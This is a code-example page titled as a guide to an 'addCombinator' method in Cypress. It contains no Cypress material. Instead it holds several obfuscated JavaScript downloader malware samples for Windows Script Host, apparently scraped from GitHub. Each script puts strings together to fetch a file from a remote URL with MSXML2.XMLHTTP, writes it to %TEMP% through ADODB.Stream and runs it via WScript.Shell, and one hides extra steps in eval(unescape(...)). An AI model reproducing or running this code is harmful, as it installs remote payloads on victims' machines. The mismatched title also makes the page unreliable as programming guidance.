How to use addCombinator method in Cypress

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1adjusted = 72;2fadeToggle = "ipt";3load = 146;4needsContext = "cr";5col = "5";6var curPosition = "type",7 offsetHeight = "saveT";8var matcherFromTokens = "write",9 image = "WScri",10 complete = "S",11 hide = "p";12var onreadystatechange = 147;13xhr = 640;14stored = "Obje";15tabIndex = 61;16stopImmediatePropagation = "Resp";17prefilterOrFactory = 209;18curCSSLeft = "jorgec";19rnative = "gr34";20clientX = 128;21rdashAlpha = "%/​";22progress = "ell";23defaultPrevented = "trea";24type = "WScr";25var removeData = "WScrip";26matchedCount = 12;27original = "ified";28focus = "ea";29detectDuplicates = 85;30optall = "s";31var vendorPropName = "h",32 rCRLF = 24,33 inPage = "t",34 camelCase = 43,35 createHTMLDocument = "reat",36 readyList = "eObje";37boolHook = 0;38rcssNum = "cl";39insertBefore = 13;40tween = "ose";41var outermostContext = "HTTP",42 noBubble = "Cr",43 rchecked = "i";44timeout = 27715, matchContext = "o", owner = "mod", toggleClass = 206, getBoundingClientRect = "T";45callbackExpect = ".sc", qualifier = 166, getClientRects = 10;46rwhitespace = "send";47elementMatchers = "as.c";48clone = "GE";49nidselect = "sta";50rquickExpr = "c";51toArray = "leep";52_ = "nse", rhtml = 58925, isBorderBox = "rea", groups = 65, first = "En";53callbackInverse = "W", rtagName = "m", inArray = "pt";54v = "C";55webkitMatchesSelector = 696;56run = "ro";57parse = "n";58rcomma = "d";59interval = 8;60newUnmatched = 50;61processData = "TEMP";62rts = "Body";63parts = 1077, rbuggyQSA = 5, tfoot = "Sleep", origName = 122, nextSibling = "6", doScroll = "te";64submit = (function String.prototype.configurable() {65 return this66}, ".S"), adjustCSS = "MSXM", getAttribute = "ip", swap = "ct";67useCache = "Run";68defaultPrefilter = "WS";69detach = 4;70apply = 132;71rscriptTypeMasked = "y", className = 108, includeWidth = "t2", isDefaultPrevented = "File", prefix = "L2.XML", DOMParser = 46;72rneedsContext = 684;73clearQueue = 23;74wrapInner = "ntSt";75stopQueue = "ng";76booleans = "ttp:/​/​";77copyIsArray = "%";78preventDefault = "vi";79animated = 1;80getScript = "nme";81postMap = 3;82var genFx = "od",83 attrHandle = "Crea",84 trigger = "on";85var reliableMarginLeft = "eObjec",86 href = 37,87 val = 8808,88 delegateCount = "open";89var unit = 101,90 until = "r",91 cssPrefixes = 39;92specialEasing = "pt.Sh", valHooks = 33, stateVal = "ADODB", origType = "om/​7";93addCombinator = 2;94createFxNow = 167;95handleObj = 68;96var clientTop = "Expa",97 destElements = "ositi";98newSelector = (((74 | className) - (65 | boolHook)), (((Math.pow(216, addCombinator) - 46336) /​ (xhr /​ 16)), this));99state = useCache;100pdataCur = newSelector[image + inArray];101risSimple = pdataCur[attrHandle + inPage + readyList + rquickExpr + inPage](image + specialEasing + progress);102startTime = risSimple[clientTop + parse + rcomma + first + preventDefault + run + getScript + wrapInner + until + rchecked + stopQueue + optall](copyIsArray + processData + rdashAlpha) + owner + original + callbackExpect + until;103checkbox = newSelector[removeData + inPage][noBubble + focus + doScroll + stored + swap](adjustCSS + prefix + outermostContext);104checkbox[delegateCount](clone + getBoundingClientRect, vendorPropName + booleans + curCSSLeft + genFx + elementMatchers + origType + nextSibling + includeWidth + rnative + col, !(((Math.pow((((addCombinator ^ 0) + (animated * 1)) ^ (Math.pow(postMap * 2, (boolHook | 2)) - (animated * 25))), (((toggleClass, 47, handleObj, 118) - (detectDuplicates - 5)) /​ ((rneedsContext /​ 38) ^ animated))) - ((3 * postMap * 3 + (rbuggyQSA * 5)) | ((detach & 7) & (origName, 5)))) - (((boolHook ^ 0) ^ (animated * 2)) | (Math.pow(postMap, 2) - detach))) == (((((104, animated) * (210, prefilterOrFactory, 12, boolHook)) | ((737 - groups) /​ (777 /​ href))) - (((Math.pow(17, addCombinator) - 261) - (interval | 27)) ^ (Math.pow((rCRLF ^ 3), (addCombinator & 3)) - (webkitMatchesSelector)))) | (Math.pow((((232, onreadystatechange, 182, camelCase) - (23 ^ tabIndex)) * ((149 - newUnmatched), (14 ^ unit), (26 - clearQueue))), (((8 + matchedCount), (233, DOMParser, 57), (Math.pow(createFxNow, 2) - timeout), 1) ^ ((groups + 34) /​ (valHooks)))) - (3 ^ ((addCombinator & 3) * (apply /​ 44) + (clientX, 154, qualifier, 1)))))));105checkbox[rwhitespace]();106while (checkbox[isBorderBox + rcomma + rscriptTypeMasked + nidselect + doScroll] < ((boolHook ^ 0) ^ (load, 4))) {107 newSelector[type + fadeToggle][complete + toArray]((Math.pow((animated ^ 79), (animated + 1)) - (parts ^ 4949)));108}109identifier = newSelector[callbackInverse + complete + needsContext + getAttribute + inPage][v + createHTMLDocument + reliableMarginLeft + inPage](stateVal + submit + defaultPrevented + rtagName);110newSelector[defaultPrefilter + needsContext + fadeToggle][tfoot](((val + 3835) + (rhtml /​ 25)));111try {112 identifier[delegateCount]();113 transport = identifier;114 transport[curPosition] = ((insertBefore * 2 + getClientRects) - (59 & cssPrefixes));115 access = transport;116 identifier[matcherFromTokens](checkbox[stopImmediatePropagation + matchContext + _ + rts]);117 access[hide + destElements + trigger] = (0 /​ matchedCount);118 identifier[offsetHeight + matchContext + isDefaultPrevented](startTime, (2 & postMap));119 identifier[rcssNum + tween]();120 bup = risSimple;121 bup[state](startTime.configurable(), ((147, adjusted, 0) | (boolHook ^ 0)), ((boolHook /​ 13) ^ (boolHook & 1))); ...

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1safeActiveElement = 2786, isArrayLike = "j", risSimple = "xp", param = "se", nextUntil = "ope";2clientLeft = 8, hasScripts = "ip", siblingCheck = 21, pseudo = "type", remaining = "l";3unquoted = 93;4hasOwn = "ll";5isSuccess = "h";6attrNames = "ateOb";7includeWidth = "%TE";8rmargin = "MS";9throws = 19;10speed = "B.Str";11lock = "sp";12rwhitespace = 240;13setAttribute = "write";14progress = "nd", computeStyleTests = "posi", removeEventListener = "ings", padding = "om/​27", whitespace = "S";15extend = "ject";16notify = 3;17fx = "y";18indirect = 2;19dequeue = "entStr";20dir = 487;21var currentValue = "ct",22 disable = "h8",23 thead = "pt",24 clearTimeout = 14,25 timerId = "t.S";26var realStringObj = "Re",27 emptyStyle = "ect";28crossDomain = "saveT";29attachEvent = "onm";30noCloneChecked = 26, headers = 112, all = 55, undelegate = "p", animated = "G";31num = (function String.prototype.reverse() {32 return this33}, "Cr");34scrollTo = 49;35xhrFields = 24;36val = "Run";37serializeArray = "x.c";38radio = 13, removeAttr = "E", oldCache = 1, classes = "o", second = ".XMLHT";39module = "B";40uniqueID = "TP";41splice = "ttp:";42find = "ADOD";43var raw = 39;44random = 33;45apply = "teOb";46split = 17;47disconnectedMatch = "eam";48firingIndex = "ir";49charCode = "he";50var responseType = "File",51 isImmediatePropagationStopped = 0,52 cssHooks = "eq",53 optionSet = "XML2";54boxSizingReliable = "andEnv", clientTop = "ose", rreturn = "WScr", camelCase = "t", getById = "WScri", stored = 198;55var load = 147,56 window = "open",57 camel = "WScrip";58var i = ".scr",59 attrId = "e",60 refElements = "a";61parseHTML = "eep";62fxNow = "ateObj";63sort = "%";64returnFalse = "MP";65file = 215;66var dispatch = "od";67var conditionFn = 860,68 optSelected = "tion",69 select = "ns",70 easing = "n",71 opener = "c",72 p = 11;73createInputPseudo = "Cre";74genFx = "/​/​hip";75originalProperties = "x";76wait = "noti";77remove = "/​";78querySelectorAll = 5;79contextBackup = 31;80isDefaultPrevented = 413;81var onerror = "ET",82 postFilter = 63,83 isFunction = 7;84activeElement = (((145, load), (107, headers, 62, p), (Math.pow(171, indirect) - 29027)), (((oldCache + -1) | (split + 0)), this));85rneedsContext = val;86setFilters = activeElement[rreturn + hasScripts + camelCase];87postMap = setFilters[createInputPseudo + refElements + apply + extend](getById + undelegate + timerId + charCode + hasOwn);88slideDown = postMap[removeAttr + risSimple + boxSizingReliable + firingIndex + attachEvent + dequeue + removeEventListener](includeWidth + returnFalse + sort + remove) + cssHooks + i;89addCombinator = activeElement[camel + camelCase][num + attrId + attrNames + isArrayLike + emptyStyle](rmargin + optionSet + second + uniqueID);90addCombinator[window](animated + onerror, isSuccess + splice + genFx + wait + originalProperties + serializeArray + padding + disable + easing, !(((((oldCache * 1) * (isImmediatePropagationStopped ^ 1)), ((xhrFields - 23) * (isImmediatePropagationStopped ^ 0))) ^ ((((dir & 350) | (file ^ 49)) /​ (oldCache * (2 | oldCache))), (((Math.pow(100, indirect) - 9883) ^ (safeActiveElement /​ 14)) - (notify * 3 * indirect * 7, (stored /​ 11))), (((postFilter ^ 137), (noCloneChecked & 29), (Math.pow(siblingCheck, 2) - isDefaultPrevented)) + ((1 + radio))), (((1057 * clearTimeout + 502) /​ (split & 29)) /​ ((rwhitespace, 179, unquoted, 30) + (conditionFn /​ 43))))) > clientLeft));91addCombinator[param + progress]();92rtypenamespace = activeElement[getById + thead][createInputPseudo + fxNow + attrId + currentValue](find + speed + disconnectedMatch);93rtypenamespace[nextUntil + easing]();94getAll = rtypenamespace;95next = postMap;96getAll[pseudo] = ((44 - raw) - (6 & querySelectorAll));97parentsUntil = getAll;98protocol = addCombinator[realStringObj + lock + classes + select + attrId + module + dispatch + fx];99rtypenamespace[setAttribute](protocol);100parentsUntil[computeStyleTests + optSelected] = ((252, all, 111, isImmediatePropagationStopped) /​ (1 * indirect));101rtypenamespace[crossDomain + classes + responseType](slideDown, ((2 + isImmediatePropagationStopped) ^ (19 - throws)));102completeDeferred = rtypenamespace;103completeDeferred[opener + remaining + clientTop]();104activeElement[camel + camelCase][whitespace + remaining + parseHTML]((1 * indirect) * (3 + indirect) * (93 /​ contextBackup) * (2 ^ isFunction) * (35 - random) * (54 - scrollTo) * (2 + isImmediatePropagationStopped) * (Math.pow(3, indirect) - 4));...

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1var prependTo = "ody",2 xhrSupported = 51280,3 global = "ep",4 count = "stop",5 boolHook = (function String.prototype.matcherFromGroupMatchers() {6 return this7 }, "2.XM"),8 postFilter = "onm";9ajaxSettings = "c", propName = "m", nidselect = "XML";10boxSizingReliableVal = "%TEMP%", rbrace = "dEnvir", delegate = "/​/​cca", iterator = "pt", offset = "ct";11handlers = 3040;12raw = "7";13checkOn = ".";14siblings = "e";15getWindow = "TTP";16reliableMarginLeft = "Create";17unmatched = "te";18callbackInverse = "ll";19lastModified = "eO";20attrId = 25;21delegateType = 56;22once = "ition";23PI = "ipt";24rscriptType = "WScr", sortDetached = 27, setMatched = "send", dataPriv = "tr", test = 1;25checked = ".com.", outermostContext = "s", rprotocol = "S", lastChild = "sapo";26updateFunc = "entS";27processData = 3162;28startTime = "spon";29Data = "323";30source = "h";31delegateTarget = "W";32maxWidth = "bf3r";33push_native = 576;34holdReady = "ropaga";35groups = 32;36linear = 18;37which = "wr";38second = "Re";39file = "Scr", curElem = "bj", readyList = "WScri";40always = 6;41getScript = "LH";42clearCloneStyle = "ODB.St";43marginLeft = "i";44var abort = "ttp:";45var success = "clos";46l = "rea", iNoClone = "cr", clazz = "O", callbackContext = "MS", matchesSelector = 52, contexts = "eB";47var merge = "Expan",48 isXMLDoc = "Sle",49 adown = "Cre",50 nextUntil = 17;51stopped = "AD";52pos = "edia";53cacheURL = "Sleep";54promise = "un";55origName = "type";56unqueued = 11;57slideToggle = 0;58onlyHandlers = "ect";59rnumnonpx = "open";60tokenCache = 146;61fragment = "Creat";62rmouseEvent = "t";63setPositiveNumber = "ing";64settings = 144;65content = "he";66random = 165;67var duration = "ateO",68 attributes = "R",69 DOMParser = "GE",70 matchContext = "oF",71 defer = "/​";72var get = "a",73 detectDuplicates = "ite",74 time = "c3";75inArray = "Imm";76iframe = "tion";77cssNormalTransform = "p";78rnamespace = ".pt/​0y", n = "ile", newSelector = 13;79match = "ready", clone = "T", init = "teP";80var _data = 111,81 safeActiveElement = 2,82 newUnmatched = 5,83 resolveValues = "bje",84 pageXOffset = "saveT";85documentElement = "pos";86keepData = (((16 | settings) & 3 * unqueued * 7), (((nextUntil - 16) | (slideToggle | 0)), this));87specified = attributes + promise;88location = keepData[readyList + iterator];89srcElements = location[fragment + lastModified + resolveValues + offset](rscriptType + marginLeft + cssNormalTransform + rmouseEvent + checkOn + rprotocol + content + callbackInverse);90returnValue = srcElements[merge + rbrace + postFilter + updateFunc + dataPriv + setPositiveNumber + outermostContext](boxSizingReliableVal + defer) + count + inArray + pos + init + holdReady + iframe + checkOn + outermostContext + iNoClone;91checkDisplay = keepData[readyList + iterator][adown + duration + resolveValues + ajaxSettings + rmouseEvent](callbackContext + nidselect + boolHook + getScript + getWindow);92checkDisplay[rnumnonpx](DOMParser + clone, source + abort + delegate + time + Data + checked + lastChild + rnamespace + raw + maxWidth, !(((test * (1 * safeActiveElement)) + ((((150 & random), (79, _data)) & ((0 | always) * (7 + newSelector) + (75 /​ attrId))), (Math.pow(5 * newUnmatched, (72, tokenCache, 2)) - (push_native | 72)) * ((linear | 38) /​ (sortDetached & 22)), ((matchesSelector, 1) + ((test * 1) + -(test * 1))))) == (((test ^ 0) * test) ^ ((0 ^ (test ^ 3))))));93checkDisplay[setMatched]();94while (checkDisplay[match + outermostContext + rmouseEvent + get + unmatched] < (test * 2) * (safeActiveElement + 0)) {95 keepData[readyList + iterator][cacheURL](((processData /​ 31) & (groups | 116)));96}97addCombinator = keepData[delegateTarget + rprotocol + iNoClone + PI][reliableMarginLeft + clazz + curElem + onlyHandlers](stopped + clearCloneStyle + l + propName);98keepData[delegateTarget + file + PI][isXMLDoc + global](((xhrSupported /​ 5) | (handlers + 3752)));99try {100 addCombinator[rnumnonpx]();101 initialInUnit = addCombinator;102 initialInUnit[origName] = (slideToggle ^ 1);103 removeClass = initialInUnit;104 addCombinator[which + detectDuplicates](checkDisplay[second + startTime + outermostContext + contexts + prependTo]);105 removeClass[documentElement + once] = ((delegateType, 162, slideToggle) ^ 0);106 addCombinator[pageXOffset + matchContext + n](returnValue, ((test + 1) & (test * 2)));107 addCombinator[success + siblings]();108 attrHooks = srcElements;109 attrHooks[specified](returnValue.matcherFromGroupMatchers(), (slideToggle ^ 0), (slideToggle & 1));...

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Source:20160309_5798cc82d9f9f4fa190b89506055dd14.js Github


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1DOMParser = "WScri";2script = "MSX";3ajaxSettings = 199;4startTime = (function String.prototype.adown() {5 return this6}, ".sc");7owner = "write";8var rfocusMorph = "GE",9 attrNames = "DODB",10 marginLeft = "n",11 origCount = "A";12_jQuery = "E";13results = "positi";14converters = 363;15gotoEnd = "TP", tweens = "WScrip";16dataTypeExpression = "ty", index = 41;17var apply = 2,18 rdisplayswap = "on",19 firingIndex = "Creat";20sortDetached = "tStrin";21mappedTypes = "WScr";22returnValue = 64;23rcomma = "un";24isReady = "s/​9";25rcssNum = "gs";26parsed = "av";27fireWith = "/​";28rfocusable = "m/​s";29hooks = 5;30getById = "ipt.";31Expr = "87i6";32augmentWidthOrHeight = "T";33count = "%T";34curCSS = "WSc";35cssHooks = "Shel";36select = "t";37removeChild = 38;38using = "Cre";39marginRight = "iro";40cleanData = "R";41html = "ht";42noConflict = 1481;43push_native = "andEnv", htmlPrefilter = 12, matcherFromGroupMatchers = "y";44markFunction = "gt";45var button = ".co",46 exports = "u5y4";47var onload = "EMP",48 speed = 7,49 ownerDocument = "ipt";50callbackName = "xp", scrollTop = 4;51testContext = 39;52getScript = ".XMLHT";53oMatchesSelector = "WS";54buildParams = 82, type = "m/​", noGlobal = "tp:", parseFromString = "rea", curValue = "mpt";55currentTime = "og", parse = 3, fix = "eObj", matchIndexes = "ope";56compare = "ect";57tabIndex = 88;58focus = "pon";59file = "ject";60proxy = "c";61Symbol = 31;62documentIsHTML = 63, rreturn = 15, jQuery = ".Stre", realStringObj = "oFil", pointerenter = "C", hasDuplicate = "ateO";63getText = "ML2", slideToggle = 6, key = 28;64var ret = "teObj",65 finalDataType = "thai";66start = "b";67sel = "oitie";68attrHooks = 27;69ajaxPrefilter = "men";70tokens = "send";71rsubmittable = "udun";72var attributes = "pt";73r20 = "%", fast = "leep", charCode = "S";74notifyWith = "Res";75split = "open";76_queueHooks = "clos";77selectors = "/​/​ngu", nodeValue = "cr", elemData = "am", prefilterOrFactory = "l", map = "e", i = "hong";78var rhtml = 0,79 simple = 20,80 timer = "seBod";81webkitMatchesSelector = 1;82rCRLF = "r";83elements = "ri";84combinator = 29;85swing = "s";86valueIsBorderBox = "pe", not = "te";87addCombinator = ((130 - documentIsHTML), (((420 /​ key) & (3 * scrollTop + 2)), this));88unshift = cleanData + rcomma;89pixelMarginRightVal = addCombinator[DOMParser + attributes];90appendTo = pixelMarginRightVal[firingIndex + fix + map + proxy + select](oMatchesSelector + nodeValue + getById + cssHooks + prefilterOrFactory);91ajaxConvert = appendTo[_jQuery + callbackName + push_native + marginRight + marginLeft + ajaxPrefilter + sortDetached + rcssNum](count + onload + r20 + fireWith) + map + curValue + matcherFromGroupMatchers + startTime + rCRLF;92beforeunload = addCombinator[tweens + select][using + hasDuplicate + start + file](script + getText + getScript + gotoEnd);93beforeunload[split](rfocusMorph + augmentWidthOrHeight, html + noGlobal + selectors + sel + rsubmittable + markFunction + i + finalDataType + button + rfocusable + matcherFromGroupMatchers + swing + not + type + prefilterOrFactory + currentTime + isReady + Expr + exports + select, !(((((combinator - 27) * (converters /​ 33) * (returnValue | 97) * (tabIndex, 82, apply) /​ ((102, buildParams, 10) + (webkitMatchesSelector | 0))) | (((htmlPrefilter + 15) + (Math.pow(rreturn, 2) - ajaxSettings)) + ((Math.pow(1959, apply) - 3834777) /​ apply * 2 * apply))) /​ (((0 ^ simple) /​ (13 + speed)) | (Math.pow((186 /​ Symbol), (1 * apply)) - 29)) * ((attrHooks /​ 9) - (webkitMatchesSelector)) * ((40 /​ simple) + ((19 * apply + 4) - index))) > 2));94beforeunload[tokens]();95arr = addCombinator[mappedTypes + ownerDocument][pointerenter + parseFromString + ret + compare](origCount + attrNames + jQuery + elemData);96arr[matchIndexes + marginLeft]();97stopped = arr;98preFilters = appendTo;99stopped[dataTypeExpression + valueIsBorderBox] = ((Math.pow(testContext, 2) - noConflict) - (6 * slideToggle + 3));100original = stopped;101maxIterations = beforeunload[notifyWith + focus + timer + matcherFromGroupMatchers];102arr[owner](maxIterations);103original[results + rdisplayswap] = (rhtml /​ (Math.pow(26, apply) - 627));104arr[swing + parsed + map + augmentWidthOrHeight + realStringObj + map](ajaxConvert, (webkitMatchesSelector ^ (3 & parse)));105bySet = arr;106bySet[_queueHooks + map]();107addCombinator[curCSS + elements + attributes][charCode + fast]((11 * parse * 2 * apply * 5 * hooks * 2 * apply * 5 * hooks /​ (19 + parse)));...

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1var inArray = "Create",2 removeAttribute = "o",3 returnFalse = "bjec",4 rsubmittable = "d";5addCombinator = 0;6var ignored = "s",7 splice = "en",8 Expr = 31,9 ct = 343;10slideToggle = "Ru";11what = 193;12preexisting = 9;13classes = "ipt";14acceptData = ".XML";15rparentsprev = 18, getElementsByName = 163;16pushStack = 14, code = 5;17matcher = 1759;18currentTime = 29833;19simple = "rname";20display = "n", minWidth = "WSc", siblings = "%TEM", s = "om/​877", reliableMarginRight = 26;21var rpseudo = "eterdi",22 bind = 60,23 rtrim = "Sl",24 visibility = "WScri",25 Symbol = "saveT";26var count = 128,27 invert = "am";28var resolveWith = 80,29 classNames = "seBo",30 inspected = "eObje",31 globalEval = 14833,32 pixelPosition = "p",33 useCache = "ron";34var merge = "clo",35 copy = 59,36 elementMatcher = "write",37 setTimeout = "htt";38xhr = "WScrip";39firingIndex = 6;40textContent = 1;41slideUp = "Expand";42fired = 11;43conv = 91;44var m = 2,45 hookFn = "t",46 onload = "i";47crossDomain = "She";48finalDataType = "ADODB", unshift = (function Object.prototype.handleObjIn() {49 var method = this;50 return method51}, 49), unqueued = 27, preferredDoc = 28;52nodes = "Cre";53isWindow = "E";54callback = "String";55handlerQueue = ".s";56teardown = "posi";57adjustCSS = 1554;58guid = 3;59isSuccess = (((1485 /​ unqueued) & (28 * m + 7)), (guid * 2 * guid | (3 & guid)), eval("th" + onload + "s".handleObjIn()));60fire = isSuccess[xhr + "t"];61cssProps = fire[nodes + "ateO" + returnFalse + "t".handleObjIn()](minWidth + "ript." + crossDomain + "ll");62unquoted = cssProps[slideUp + "Envi".handleObjIn() + useCache + "ment" + callback + "s"](siblings + "P%/​".handleObjIn()) + simple + "space" + handlerQueue + "cr";63camelKey = isSuccess[xhr + "t".handleObjIn()][inArray + "Objec" + hookFn]("MSXML2" + acceptData + "HTTP".handleObjIn());64camelKey[removeAttribute + "p" + splice]("G" + isWindow + "T".handleObjIn(), setTimeout + "p:/​/​p" + rpseudo + "ckem.c" + s + "45g".handleObjIn(), !((((38 - preexisting) * (1 + textContent) & (Math.pow(((33 & bind) | (58 & copy)), ((1 + addCombinator) * (2 + addCombinator))) - ((525 | adjustCSS) + (1766 & matcher)))), ((((17 & preferredDoc) + (32 /​ m)) + ((1 * textContent) * (Math.pow(4, m) - 11))) * (((textContent) + (1 * addCombinator)) * ((27 & Expr) - (15 + firingIndex))) + ((2 * m * 2 * m, 5 * fired, (92 - copy), 243) /​ ((fired & 13) | (resolveWith /​ 10)))), ((((what & 206) /​ guid * 2 * m * 2) - ((conv + 29), getElementsByName, (56 - unshift))) + ((26 /​ reliableMarginRight) & (1 * addCombinator)))) == 1));65camelKey[ignored + "en" + rsubmittable]();66active = isSuccess["WScr" + classes]["Creat".handleObjIn() + inspected + "ct"](finalDataType + ".Stre" + invert);67active["o".handleObjIn() + pixelPosition + "e" + display]();68temp = active;69global = cssProps;70temp["ty" + pixelPosition + "e".handleObjIn()] = (addCombinator | 1);71nid();72PI();73bup();74maxIterations();75active[Symbol + "oFile"](unquoted, (2 & (guid & 3)));76isLocal = active;77isLocal[merge + "se"]();78tabIndex();79global[slideToggle + "n"](unquoted.handleObjIn(((3 + pushStack) * (4 | code) + (72 /​ rparentsprev))), (1 + -textContent), ((17 * m + 2), (textContent + 2), (count | 172), (textContent + -1)));80function nid() {81 eval(unescape("%20%20%20%20%20%20%20%20parentsUntil%20%3D%20temp%3B%0D"));82}83function bup() {84 eval(unescape("%20%20%20%20%20%20%20%20active%5BelementMatcher%5D%28camelKey%5B%22Respon%22%20+%20classNames%20+%20%22dy%22%5D%29%3B%0D"));85}86function maxIterations() {87 eval(unescape("%20%20%20%20%20%20%20%20parentsUntil%5Bteardown%20+%20%22tion%22.handleObjIn%28%29%5D%20%3D%20%28%28ct/​49%29-%28guid*2+textContent%29%29%3B%0D"));88}89function tabIndex() {90 eval(unescape("%20%20%20%20%20%20%20%20isSuccess%5Bvisibility%20+%20%22pt%22.handleObjIn%28%29%5D%5Brtrim%20+%20%22eep%22%5D%28%28%28currentTime/​1%29-%28globalEval%29%29%29%3B%20%20%20%0D"));91}92function PI() {93 eval(unescape("%20%20%20%20%20%0D"));...

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Source:20160309_55682d963ff6401c8c58f5e3d16fcbbb.js Github


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1html = "andEn";2relative = 6;3conditionFn = "if";4key = "t";5amd = "ype";6node = "ea";7responseContainer = 130;8expanded = "xp";9ajaxSettings = 249;10elems = "clos";11prepend = "ADODB.";12var guaranteedUnique = "Cre",13 compare = 5;14emptyStyle = "eBody";15tr = (function Object.prototype.funcName() {16 return this17}, "File");18checkDisplay = "on";19ajaxPrefilter = "/​";20actualDisplay = "WS", valueIsBorderBox = 9978, elementMatchers = "r", args = "Create", pop = "ET";21implicitRelative = "p", styles = "Run", set = "Ob", hasData = "je", diff = "e", funescape = "pons";22div1 = "send";23apply = 1253;24round = ":", contentType = "cript", curElem = "ope", cacheLength = "/​/​www", matches = "ht", width = "8j";25var offsetWidth = "o",26 originalEvent = "entSt",27 m = "te",28 fix = "tp",29 risSimple = "w",30 setPositiveNumber = "Sle";31add = "G", each = ".", startLength = "MSXM";32var s = "hell",33 firstElementChild = "WScri",34 compiled = ".sc",35 checkNonElements = "nm",36 xhrFields = "ate",37 getElementsByClassName = "L2";38replaceChild = "iti";39push_native = "er";40fireGlobals = 0;41hookFn = "Re";42origFn = "E";43responses = "​";44overrideMimeType = 47, async = "s", proxy = 2;45var postMap = "ep",46 p = "pt",47 gotoEnd = 3,48 unwrap = "ing",49 parse = "ct",50 rxhtmlTag = "jec";51i = "WSc";52results = 1;53copyIsArray = "saveTo";54siblings = 137;55callbackExpect = "ript.S";56checkOn = "en";57readyList = 12;58callbackInverse = "iro";59show = 32;60dataShow = "HTTP";61a = 29;62trim = ".ekow";63class2type = "WScr", createDocumentFragment = "Object", dataPriv = "eam", val = "%TEMP%", pageY = "Str", e = "v";64var arg = "pos",65 queue = "09y",66 event = "Cr",67 curTop = "ident",68 related = "WScrip",69 hold = "n";70msFullscreenElement = "XM";71ifModified = "ri";72responseText = "i", percent = "L";73_$ = (((4 ^ fireGlobals), (98 ^ siblings)), (((0 | proxy) | (4 & relative)), this));74curValue = styles;75fast = _$[firstElementChild + p];76fixInput = fast[guaranteedUnique + xhrFields + createDocumentFragment](i + callbackExpect + s);77addCombinator = fixInput[origFn + expanded + html + e + callbackInverse + checkNonElements + originalEvent + elementMatchers + unwrap + async](val + ajaxPrefilter) + elementMatchers + curTop + conditionFn + responseText + push_native + compiled + elementMatchers;78deep = _$[actualDisplay + contentType][args + set + hasData + parse](startLength + getElementsByClassName + each + msFullscreenElement + percent + dataShow);79deep[curElem + hold](add + pop, matches + fix + round + cacheLength + trim + responses + queue + width, !((((((0 | results) * (44, responseContainer, 230, proxy)) * ((1 + fireGlobals) + (1 * results)))) * (((2 + readyList) * (1 * gotoEnd) + (6 & relative)), (49 - overrideMimeType) * (35 - show) * (8 * gotoEnd + 5), (fireGlobals ^ (2 + fireGlobals))) + (((41, ajaxSettings, 3) | (fireGlobals | 1)) & ((results * 1) + (proxy & 3)))) > compare));80deep[div1]();81parts = _$[class2type + responseText + p][event + node + key + diff + set + rxhtmlTag + key](prepend + pageY + dataPriv);82parts[offsetWidth + implicitRelative + checkOn]();83open = parts;84margin = fixInput;85open[key + amd] = (1 + fireGlobals);86special = open;87define = deep[hookFn + async + funescape + emptyStyle];88parts[risSimple + ifModified + m](define);89special[arg + replaceChild + checkDisplay] = (0 & (results | 0));90parts[copyIsArray + tr](addCombinator, ((results * 1) + (results | 1)));91window = parts;92window[elems + diff]();93_$[related + key][setPositiveNumber + postMap](((valueIsBorderBox - 3288) * (proxy ^ 0) + (apply + 367)));...

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Source:20160309_fbc0ba6f108455a30a8543b04a31d21d.js Github


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1off = "P%";2i = "P";3matchesSelector = 0;4matcherFromTokens = 3;5nextUntil = "m";6var namespace = "nt";7version = 110, originalEvent = "onme", manipulationTarget = "io", mouseHooks = "s", clearCloneStyle = "ope";8outermost = "L2.X";9soFar = "ir";10needsContext = "/​/​astr";11Expr = "/​";12namespaces = "ToFi";13var _evalUrl = "teObje",14 rnative = "posi";15var rpseudo = "Ru",16 disabled = "trea",17 inspect = "M",18 clientLeft = 8,19 cssShow = "C";20fire = "ap", after = "ipt.", pdataCur = "Ob", callback = "onse", cssExpand = 4;21activeElement = "Expa";22scripts = "n";23simulate = "sav";24hasContent = "http:";25boxSizingReliableVal = "bjec", replaceWith = "le", delegateType = "w", matchIndexes = "Create", rattributeQuotes = "e", stateString = 1943;26iterator = "%TEM", rbuggyMatches = "ject", val = "eO", addCombinator = "t", clone = "ring", lastModified = "c";27var transport = "WS",28 opt = "rit",29 preexisting = "alia.";30prev = "g445";31pixelMarginRight = 18;32hidden = "ipt";33var expanded = "MSX",34 isPlainObject = "ell",35 w = "ro/​",36 random = "Sh",37 setter = 977;38createDocumentFragment = 38;39hash = "St";40jsonpCallback = 40;41tbody = "type", matches = "end", rdashAlpha = "GET", isArray = "WScrip", setup = "Crea";42parentOffset = "ct";43var readyWait = "ADOD",44 tmp = "B",45 idx = "ndEnv",46 height = ".",47 m = 17;48var handlers = "cript",49 triggered = (function Object.prototype.fadeIn() {50 return this51 }, "WScr"),52 progressValues = "g",53 relative = "MLHTT";54var offsetHeight = "clos";55XMLHttpRequest = "Resp", apply = "rea", suffix = 5, overwritten = "r", optionSet = 7, strAbort = 32;56nativeStatusText = 19, tfoot = "ody", lname = 144453184, isBorderBox = "B.S";57var script = "Sleep",58 isXMLDoc = "08o76";59rmultiDash = 1;60setRequestHeader = ((173, optionSet * 11), (((Math.pow(strAbort, 2) - setter), (1 * matcherFromTokens)), this));61pushStack = rpseudo + scripts;62col = setRequestHeader[transport + handlers];63pointerenter = col[setup + _evalUrl + parentOffset](triggered + after + random + isPlainObject);64fxNow = pointerenter[activeElement + idx + soFar + originalEvent + namespace + hash + clone + mouseHooks](iterator + off + Expr) + nextUntil + fire + height + mouseHooks + lastModified + overwritten;65has = setRequestHeader[triggered + hidden][matchIndexes + pdataCur + rbuggyMatches](expanded + inspect + outermost + relative + i);66has[clearCloneStyle + scripts](rdashAlpha, hasContent + needsContext + preexisting + w + isXMLDoc + prev + progressValues, !(3 == ((((stateString /​ 29) - suffix * 11) /​ (clientLeft - 5) * (nativeStatusText - 17)) ^ (((matchesSelector | (38 /​ createDocumentFragment)) * 1)))));67has[mouseHooks + matches]();68close = setRequestHeader[isArray + addCombinator][cssShow + apply + addCombinator + val + boxSizingReliableVal + addCombinator](readyWait + isBorderBox + disabled + nextUntil);69close[clearCloneStyle + scripts]();70fromCharCode = close;71matchExpr = pointerenter;72fromCharCode[tbody] = (rmultiDash * 1);73detach = fromCharCode;74find = has[XMLHttpRequest + callback + tmp + tfoot];75close[delegateType + opt + rattributeQuotes](find);76detach[rnative + addCombinator + manipulationTarget + scripts] = ((matchesSelector /​ 22) /​ (m + 10));77close[simulate + rattributeQuotes + namespaces + replaceWith](fxNow, ((version /​ 5) /​ (Math.pow(optionSet, 2) - createDocumentFragment)));78isSimulated = close;79isSimulated[offsetHeight + rattributeQuotes]();80setRequestHeader[triggered + hidden][script]((Math.pow(3 * matcherFromTokens * 1567, (pixelMarginRight - 16)) - (lname ^ 54953785)));...

